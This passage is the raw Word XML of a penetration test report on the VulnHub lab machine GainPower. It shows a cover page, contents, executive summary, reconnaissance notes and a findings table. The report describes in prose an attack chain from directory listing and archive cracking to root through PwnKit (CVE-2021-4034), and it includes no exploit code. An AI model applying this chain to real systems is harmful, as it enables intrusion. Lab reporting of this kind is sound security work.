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80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">NEX-EXPERIENCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Research &amp; Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: GainPower VM (VulnHub)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Method: PwnKit Binary (CVE-2021-4034)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="16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Analyst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Greg Ochieng (Primenexuss)</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Organization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Nex-Experience</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IP</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192.168.56.132</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CentOS Linux (Apache 2.4.6)</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March 22, 2026</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Report Version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Confidential – Portfolio Use</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GitHub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github.com/PrimeNexuss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C00000" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Engagement Scope &amp; Target Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  Findings Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  Attack Chain Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Detailed Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.1  Information Disclosure — Apache Directory Listing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.2  Sensitive File Exposure &amp; Password Protected Archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.3  Weak Archive Password / Credential Reuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.4  Information Disclosure via SSH Banner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.5  Privilege Escalation via PwnKit (CVE-2021-4034)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  Remediation Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026"/>
        </w:tabs>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  Proof of Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents a full penetration test conducted against the GainPower virtual machine hosted on VulnHub. The assessment simulates a black-box attacker scenario against a CentOS Linux target running Apache, SSH, and an Ajenti web management panel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The tester successfully achieved full root-level compromise through a multi-stage attack chain: web-based information disclosure, password-protected archive cracking, SSH authentication using recovered credentials, lateral movement between low-privileged accounts, and ultimately privilege escalation to root using the PwnKit exploit (CVE-2021-4034), a critical vulnerability in the Linux PolicyKit component (pkexec).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Five distinct vulnerabilities were identified, ranging from information disclosure to a critical privilege escalation. All findings are documented with evidence screenshots, CVSS scores, MITRE ATT&amp;CK mappings, and remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Engagement Scope &amp; Target Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="12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Name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GainPower VM</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192.168.56.132</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Attacker IP</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192.168.56.1 (Kali Linux)</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Open Ports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22/TCP (OpenSSH 7.4), 80/TCP (Apache 2.4.6), 8000/TCP (Ajenti Panel)</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Operating System</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CentOS Linux</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Web Technologies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2.4.6, jQuery 1.12.4, Bootstrap 4.0.0, Font Awesome</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Full-compromise — VulnHub lab environment</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Black-box penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target was identified using netdiscover to enumerate live hosts on the local network segment. The machine was confirmed at 192.168.56.132.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="895350"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="netdiscover__5_.png" descr="netdiscover__5_.png" title="netdiscover__5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8953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 — netdiscover: Target identified at 192.168.56.132</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Port Scan &amp; Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A full TCP port scan with service and version detection was performed using Nmap. Three services were discovered: OpenSSH 7.4 on port 22, Apache 2.4.6 on port 80, and an Ajenti HTTP control panel on port 8000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1704975"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="nmap.png" descr="nmap.png" title="n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049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2 — Nmap full scan: OpenSSH 7.4, Apache 2.4.6 (CentOS), Ajenti panel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Web Application Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 hosts a watch shop e-commerce site titled "Time Zone". Wappalyzer identified the technology stack as Apache 2.4.6 on CentOS, with jQuery 1.12.4, Bootstrap 4.0, and PWA support. A Nikto scan was also conducted, revealing directory listing on /secret/, TRACE method enabled (XST risk), and multiple misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="2990850"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="port_80__1_.png" descr="port_80__1_.png" title="port_80__1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908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3 — Port 80: Time Zone watch shop web application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="2152650"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="banner_grabbing.png" descr="banner_grabbing.png" title="banner_grabb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526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4 — Wappalyzer: Technology stack fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="1943100"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="nikto.png" descr="nikto.png" title="nik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431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5 — Nikto scan: /secret/ directory listing and additional findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="12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700"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="17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CVSS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CVE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 Directory Listing — /secret/ Exposed</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BF8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</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File Exposure (Password-Protected ZIP)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8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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Archive Password / Credential Reuse</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E26B0A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Banner Information Disclosure (Username Enumeration)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F8F00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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Privilege Escalation via PwnKit (pkexec SUID)</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E26B0A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CVE-2021-4034</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
